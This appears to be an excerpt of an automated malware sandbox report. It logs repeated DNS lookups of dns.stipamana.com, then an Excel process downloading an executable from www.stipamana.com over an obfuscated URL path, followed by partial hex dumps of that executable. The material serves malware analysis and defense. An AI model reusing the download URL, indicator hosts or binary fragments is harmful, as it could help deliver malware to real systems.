                                              Dec 12, 2024 21:49:49.296081066 CET192.168.2.228.8.8.80x3705Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:56.762053967 CET192.168.2.228.8.8.80xc097Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:04.267986059 CET192.168.2.228.8.8.80xb2f2Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:11.661416054 CET192.168.2.228.8.8.80xac99Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:19.052421093 CET192.168.2.228.8.8.80x3c62Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:26.473809004 CET192.168.2.228.8.8.80x92f1Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:33.892271996 CET192.168.2.228.8.8.80x3b4bStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:41.288825989 CET192.168.2.228.8.8.80xe248Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:48.709347963 CET192.168.2.228.8.8.80xb148Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:56.119364977 CET192.168.2.228.8.8.80xd65aStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:03.540868044 CET192.168.2.228.8.8.80xca4Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:10.926779032 CET192.168.2.228.8.8.80x7196Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:18.351907969 CET192.168.2.228.8.8.80x1b35Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:25.744587898 CET192.168.2.228.8.8.80x4718Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:33.171979904 CET192.168.2.228.8.8.80x930fStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:40.557590008 CET192.168.2.228.8.8.80xb80fStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:47.941709042 CET192.168.2.228.8.8.80xbe97Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:55.361670971 CET192.168.2.228.8.8.80x8824Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:02.781596899 CET192.168.2.228.8.8.80xf30aStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:10.190834999 CET192.168.2.228.8.8.80xc0c0Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:17.607659101 CET192.168.2.228.8.8.80xbd2cStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:25.024692059 CET192.168.2.228.8.8.80x53a8Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:32.431931019 CET192.168.2.228.8.8.80xc1b9Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:39.862896919 CET192.168.2.228.8.8.80x22d1Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:47.243031979 CET192.168.2.228.8.8.80x8a16Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:54.621396065 CET192.168.2.228.8.8.80x4a7Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:02.013331890 CET192.168.2.228.8.8.80x6f88Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:09.418307066 CET192.168.2.228.8.8.80xab6cStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:16.799825907 CET192.168.2.228.8.8.80xfc60Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:24.251733065 CET192.168.2.228.8.8.80x9b0bStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:31.666935921 CET192.168.2.228.8.8.80x4a3fStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:39.080763102 CET192.168.2.228.8.8.80x6282Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:46.536843061 CET192.168.2.228.8.8.80x2dStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:53.914627075 CET192.168.2.228.8.8.80xbacaStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:54:01.342457056 CET192.168.2.228.8.8.80x1eeeStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:54:08.750524998 CET192.168.2.228.8.8.80x58e8Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:54:24.589775085 CET192.168.2.228.8.8.80xde9bStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:54:32.008743048 CET192.168.2.228.8.8.80xfcaaStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:54:39.421634912 CET192.168.2.228.8.8.80x846cStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:54:46.816812038 CET192.168.2.228.8.8.80xcd61Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 12, 2024 21:45:41.603100061 CET8.8.8.8192.168.2.220x49d6No error (0)www.stipamana.com94.156.167.55A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:45:50.788270950 CET8.8.8.8192.168.2.220x566No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:45:58.198769093 CET8.8.8.8192.168.2.220xf998No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:05.837680101 CET8.8.8.8192.168.2.220xbf7fNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:13.491419077 CET8.8.8.8192.168.2.220x2a6aNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:21.156843901 CET8.8.8.8192.168.2.220x736dNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:28.545562983 CET8.8.8.8192.168.2.220x3d2dNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:35.946887970 CET8.8.8.8192.168.2.220x30d0No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:43.361864090 CET8.8.8.8192.168.2.220xa0feNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:50.745820045 CET8.8.8.8192.168.2.220x4dfaNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:58.137223005 CET8.8.8.8192.168.2.220x384eNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:05.531486988 CET8.8.8.8192.168.2.220xff0fNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:12.938827038 CET8.8.8.8192.168.2.220xc30No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:20.306443930 CET8.8.8.8192.168.2.220x95f3No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:27.974983931 CET8.8.8.8192.168.2.220x60f6No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:35.624083042 CET8.8.8.8192.168.2.220x47c2No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:43.018866062 CET8.8.8.8192.168.2.220xa868No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:50.505089998 CET8.8.8.8192.168.2.220xe9e1No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:57.922924042 CET8.8.8.8192.168.2.220xa3fNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:05.356887102 CET8.8.8.8192.168.2.220x72c6No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:12.789191008 CET8.8.8.8192.168.2.220xbbbNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:20.175071955 CET8.8.8.8192.168.2.220x7080No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:27.608385086 CET8.8.8.8192.168.2.220xf865No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:35.028428078 CET8.8.8.8192.168.2.220x4baeNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:42.443259001 CET8.8.8.8192.168.2.220x8693No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:49.865164042 CET8.8.8.8192.168.2.220xd45cNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:57.256814957 CET8.8.8.8192.168.2.220x60b4No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:04.665467024 CET8.8.8.8192.168.2.220x7fa0No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:12.076205969 CET8.8.8.8192.168.2.220xd81cNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:19.476135969 CET8.8.8.8192.168.2.220xb47fNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:27.244282007 CET8.8.8.8192.168.2.220xd0dbNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:34.640294075 CET8.8.8.8192.168.2.220xa9b0No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:42.042783976 CET8.8.8.8192.168.2.220xb4dfNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:49.430185080 CET8.8.8.8192.168.2.220x3705No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:56.896336079 CET8.8.8.8192.168.2.220xc097No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:04.402148962 CET8.8.8.8192.168.2.220xb2f2No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:11.784126997 CET8.8.8.8192.168.2.220xac99No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:19.187814951 CET8.8.8.8192.168.2.220x3c62No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:26.607886076 CET8.8.8.8192.168.2.220x92f1No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:34.026778936 CET8.8.8.8192.168.2.220x3b4bNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:41.424036026 CET8.8.8.8192.168.2.220xe248No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:48.844182968 CET8.8.8.8192.168.2.220xb148No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:50:56.242716074 CET8.8.8.8192.168.2.220xd65aNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:03.665529966 CET8.8.8.8192.168.2.220xca4No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:11.061579943 CET8.8.8.8192.168.2.220x7196No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:18.486056089 CET8.8.8.8192.168.2.220x1b35No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:25.878966093 CET8.8.8.8192.168.2.220x4718No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:33.306296110 CET8.8.8.8192.168.2.220x930fNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:40.693830967 CET8.8.8.8192.168.2.220xb80fNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:48.075679064 CET8.8.8.8192.168.2.220xbe97No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:51:55.496759892 CET8.8.8.8192.168.2.220x8824No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:02.904727936 CET8.8.8.8192.168.2.220xf30aNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:10.325464010 CET8.8.8.8192.168.2.220xc0c0No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:17.743431091 CET8.8.8.8192.168.2.220xbd2cNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:25.159442902 CET8.8.8.8192.168.2.220x53a8No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:32.566340923 CET8.8.8.8192.168.2.220xc1b9No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:39.997255087 CET8.8.8.8192.168.2.220x22d1No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:47.366159916 CET8.8.8.8192.168.2.220x8a16No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:52:54.755981922 CET8.8.8.8192.168.2.220x4a7No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:02.137824059 CET8.8.8.8192.168.2.220x6f88No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:09.553461075 CET8.8.8.8192.168.2.220xab6cNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:16.934592009 CET8.8.8.8192.168.2.220xfc60No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:24.387618065 CET8.8.8.8192.168.2.220x9b0bNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:31.802103043 CET8.8.8.8192.168.2.220x4a3fNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:39.215998888 CET8.8.8.8192.168.2.220x6282No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:46.659801006 CET8.8.8.8192.168.2.220x2dNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:53:54.049069881 CET8.8.8.8192.168.2.220xbacaNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:54:01.466228962 CET8.8.8.8192.168.2.220x1eeeNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:54:08.888257027 CET8.8.8.8192.168.2.220x58e8No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:54:24.724996090 CET8.8.8.8192.168.2.220xde9bNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:54:32.145724058 CET8.8.8.8192.168.2.220xfcaaNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:54:39.544877052 CET8.8.8.8192.168.2.220x846cNo error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:54:46.940597057 CET8.8.8.8192.168.2.220xcd61No error (0)dns.stipamana.com87.120.121.160A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.stipamana.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.224916394.156.167.554433316C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              TimestampBytes transferredDirectionData
                                              2024-12-12 20:45:43 UTC477OUTGET /sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe HTTP/1.1
                                              Accept: */*
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: www.stipamana.com
                                              Connection: Keep-Alive
                                              2024-12-12 20:45:44 UTC320INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Thu, 12 Dec 2024 20:45:43 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 283648
                                              Last-Modified: Thu, 12 Dec 2024 19:13:08 GMT
                                              Connection: close
                                              ETag: "675b35c4-45400"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              Accept-Ranges: bytes
                                              2024-12-12 20:45:44 UTC16064INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c4 35 5b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 42 04 00 00 10 00 00 00 00 00 00 4e 60 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 04 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5[gBN` @ `
                                              2024-12-12 20:45:44 UTC16384INData Raw: e8 08 29 83 f1 2b bc 91 ca 2b 02 71 9c 72 08 a9 2b 32 e0 77 39 41 f4 06 43 90 25 ef 08 ae db 32 2f 61 ba fa 9e b3 8d 49 e7 40 13 04 69 3f fa 52 2d fc c0 7d 5e e8 a3 47 31 80 18 1e 16 68 ef e4 70 ad 16 f9 49 b8 51 71 b5 07 f1 e3 a2 ad 6e f2 ad ba 53 2d e6 81 a1 77 10 ff 12 2a 5b 4f 33 73 2c b0 86 28 02 2f 33 44 c2 39 37 84 d6 b9 48 39 f2 8b f6 31 54 0d e3 b7 3e 02 a9 8d c3 e3 05 4e 73 8c e8 ee 77 55 c5 a2 45 e2 87 a7 25 b2 8a fe b0 18 4d 9c 75 2a 7e c7 ec 0e 25 cf 8d 12 16 67 20 76 9c 4d c4 0c 0d 5a 91 74 96 a7 00 4d 32 2e 57 56 a8 47 02 44 43 7e 28 45 8f f1 f5 19 65 a5 9f d4 3e e5 57 e8 19 41 16 1e d5 96 08 49 cb 13 3f f5 d1 31 9d ee 0d 5e 87 ba bb 79 bd a2 e6 e1 e9 b1 3b 2d df e8 e2 cf 9b cb 68 f0 d3 a9 bc 9e 4b 54 1b 7c 73 5a ed 76 8b c7 17 96 5e e8 3d
                                              Data Ascii: )++qr+2w9AC%2/aI@i?R-}^G1hpIQqnS-w*[O3s,(/3D97H91T>NswUE%Mu*~%g vMZtM2.WVGDC~(Ee>WAI?1^y;-hKT|sZv^=
                                              2024-12-12 20:45:44 UTC16384INData Raw: 79 78 d3 73 88 dd 0d 0f b7 90 d4 10 43 3b 21 66 0a 3d 51 60 fe 7a 65 65 73 25 b3 c3 a1 e1 89 4b a1 4e d6 74 4d 15 54 a7 41 cf d8 5a 24 e4 81 a6 54 c7 e9 ef 36 ae c7 b3 e8 7a eb 33 d6 69 91 c9 a4 80 9e 3c d5 37 fd 60 c9 5c cc 7f ea 48 35 60 4b af 22 85 bd a6 7c 5c 7c 32 0c 6c d4 23 82 3f 43 b8 bc 3e 17 ce 09 32 f3 89 1a c5 3a 2e d6 f9 5c 7c a4 71 da 2f 6a 84 df 79 14 fc 69 89 65 a0 7e 7a e1 91 8c 7f 77 c8 a0 4d 0a ab 3c 75 ec b2 fd 84 c1 3d 6d 9a 30 40 4b 86 02 e2 29 9d 51 35 7b 64 e8 6c e5 1e bf 10 c2 fa e9 9c aa 48 db 62 81 cf d8 42 20 41 10 53 b9 97 87 db d7 7a a4 58 8e b2 66 f9 47 69 58 46 e5 57 71 6a cd d2 d7 fc 30 48 ee 74 93 de e5 d7 89 59 61 c7 5a 1c 7a 93 5e e0 13 e4 8f 9c 4c 19 89 16 f0 24 3b 7d e4 10 24 7f 5c 23 57 ae 10 68 a1 cc d4 36 19 43 26
                                              Data Ascii: yxsC;!f=Q`zees%KNtMTAZ$T6z3i<7`\H5`K"|\|2l#?C>2:.\|q/jyie~zwM<u=m0@K)Q5{dlHbB ASzXfGiXFWqj0HtYaZz^L$;}$\#Wh6C&
                                              2024-12-12 20:45:44 UTC16384INData Raw: e8 5b ab 9d 05 37 cd 06 66 4a 1e b6 34 e4 3a 29 48 a8 f2 e8 33 73 c0 bb c2 3c 08 59 2e f9 58 d3 23 e8 12 36 35 2a e4 96 67 5f 38 78 43 3d d2 58 c7 b1 14 cd d6 b7 4d bb e3 c1 9b f7 a6 94 62 c0 df b9 ad 9c 36 14 f0 fa 88 ac 08 16 01 5a 72 15 87 c6 a6 bb 06 cc 7e 3b 50 b3 14 74 32 0e f6 48 f4 cd 76 4c 73 f8 e3 b4 7a 4b 3c 34 b1 a6 3b 7f e5 21 62 39 9f 5e 8c b4 7c 50 2a 9b 5e 82 14 f6 f0 10 f0 59 29 26 d5 a8 3e 9f 93 57 86 c5 66 ce f4 2a 57 f3 e3 35 c4 16 01 53 88 f7 7b 67 b5 76 56 25 aa 04 49 d7 75 29 c8 8c b0 d2 4f 21 83 2f 06 54 32 a8 fb 0c 04 c9 9f 44 e0 4b aa ea cd ca 6f c0 28 4e 8a a4 26 48 25 c5 ce cf 79 a5 a2 f6 04 a9 42 48 04 ef fe 3a 11 fd 3f 0a da 42 9d 55 66 dd e7 dc 16 ba bd 17 2a 1d a3 88 2e 4f 01 71 55 93 d6 f6 bf ed 02 e8 e3 e4 91 39 0a f0 18
                                              Data Ascii: [7fJ4:)H3s<Y.X#65*g_8xC=XMb6Zr~;Pt2HvLszK<4;!b9^|P*^Y)&>Wf*W5S{gvV%Iu)O!/T2DKo(N&H%yBH:?BUf*.OqU9
                                              2024-12-12 20:45:44 UTC16384INData Raw: 0f 81 3f 05 0c e9 a4 92 b1 3e c7 93 6c 88 b3 09 bc 5f 73 25 c2 b8 d2 de 31 3e 95 31 0c 23 8f 2f 82 c2 ae 88 76 bf 5f 14 3b 89 e0 28 4f 20 a8 da c3 88 04 a6 da 97 4d ed 03 d4 14 32 7e db ad 34 f2 65 e3 3e 73 1c b6 37 b2 6d 69 30 a7 8d 54 97 b2 87 53 a2 0b 5d 58 d3 73 fb b9 2f 0c 1a d0 ef 60 7e f2 c6 f4 55 ad df 3a c1 bb 08 26 5f 99 f9 7a 8b 16 49 bb 12 b1 41 1b 4b f9 76 df 6a f8 b6 b6 7d 18 5c 82 88 15 cd 1c 7f 58 38 07 f5 30 ed 6d ac 93 db 17 7e e6 71 32 4a 10 de bf fa 65 81 92 28 9d cf 2b 06 a6 d3 e4 b6 da f5 0e 08 1b d8 47 ce ef db dd 0a cb b6 ee 26 4f e7 e3 b3 82 88 1e e7 45 82 bf a2 22 93 20 d0 ca 90 9d 87 fa 3c b0 ad 2b fb 08 44 75 dd 4a fe 65 ba 7e 4c 1a 8e 15 b1 33 14 d5 28 6a bc 08 18 65 90 e9 be 11 0a 3e d3 5b 0b 49 4c 31 45 b0 45 e1 6f 92 2b 2f
                                              Data Ascii: ?>l_s%1>1#/v_;(O M2~4e>s7mi0TS]Xs/`~U:&_zIAKvj}\X80m~q2Je(+G&OE" <+DuJe~L3(je>[IL1EEo+/
                                              2024-12-12 20:45:44 UTC16384INData Raw: d0 28 2b ef ef 80 d6 b5 7c 6e 61 31 c7 4e d6 2d ea fc d1 40 16 18 f8 c0 39 20 cb 3e ea 13 9a 7e 75 97 d6 b5 21 09 13 40 cb 72 8c 47 7f ec b6 a1 6e 0d cf 9e 63 ea 33 6a 2d f5 b3 08 a8 c3 9e 92 a8 d1 11 7e 23 c2 43 06 0b cb af e2 6e 79 93 cf ac 8e e1 07 11 55 f1 a6 38 85 14 95 21 b4 b6 d2 99 87 53 3d 53 33 7d c0 03 59 93 84 52 3c ee 0e 7b fe 97 6b c4 61 a0 cf 74 e6 7f 3c 8e 70 25 5b 53 28 fb 78 d7 a9 03 2b f0 b8 22 fe ff a6 97 16 0d 25 1a dc a2 41 a9 95 af 65 6d b8 86 b1 c7 20 8a a3 d0 aa ba fe 2e 8c 14 9f 0e 51 d8 b4 56 67 a9 a1 b6 09 7b 15 eb 45 48 7e b4 2b 5e 29 a5 7f 7f 9f d0 1a 90 09 31 76 aa 60 bc 9e 7e e5 65 75 1d f5 72 b2 b9 da bc 61 06 c9 b8 6f 29 6e 78 aa 33 ef 14 12 75 8a 51 7e c6 4f 06 36 8d 7f 6c e2 3e 75 ea 72 1e ef 0a 06 1e 7c 51 41 90 45 c2
                                              Data Ascii: (+|na1N-@9 >~u!@rGnc3j-~#CnyU8!S=S3}YR<{kat<p%[S(x+"%Aem .QVg{EH~+^)1v`~eurao)nx3uQ~O6l>ur|QAE
                                              2024-12-12 20:45:44 UTC16384INData Raw: f3 f9 a9 f9 77 35 6d 4e 45 9a e6 76 db 04 e4 83 8c af e2 0e 84 5c 54 55 c4 d0 c0 c5 72 56 37 bb 88 87 39 de 21 f4 81 00 f7 3d e5 5b 07 4b 27 06 e0 69 ab 5a a9 15 0b 9d 24 38 52 34 12 96 91 79 1e 6b 5e 89 b2 f1 18 94 90 b0 4e d9 6d 15 b0 75 5f c0 55 f1 87 aa c7 d0 5c 0e b3 04 91 a6 44 cd 3f 05 06 20 21 2c 14 7e 1f 72 e4 55 fe f9 44 ad b7 38 ca 3e 89 49 c7 12 92 6f 1e 3b 73 b7 1b 7d 55 6d d6 49 28 1b dc 7a 55 51 45 b3 39 a7 f4 01 3b 51 eb de f2 27 4b 23 f1 16 a4 84 ea bc 15 4b d0 42 6a 29 1b 5a 94 32 1c 92 3b 22 fa 24 11 b6 06 2f 9c 29 34 f8 48 83 c6 0c 07 88 e4 4d cb 41 ab 0d ab 18 3e 9c 37 9e a4 7b 97 ca c8 c3 24 09 d8 f0 15 92 6f 9d 5c 84 5b 4f 81 ac 76 45 30 d1 59 62 9b 27 6b 3c fd 3e e2 80 3f 13 2d 7b 29 1d cc 0b 4c a6 76 1a 6d 7f 5e cd b9 1e 1f ad a8
                                              Data Ascii: w5mNEv\TUrV79!=[K'iZ$8R4yk^Nmu_U\D? !,~rUD8>Io;s}UmI(zUQE9;Q'K#KBj)Z2;"$/)4HMA>7{$o\[OvE0Yb'k<>?-{)Lvm^
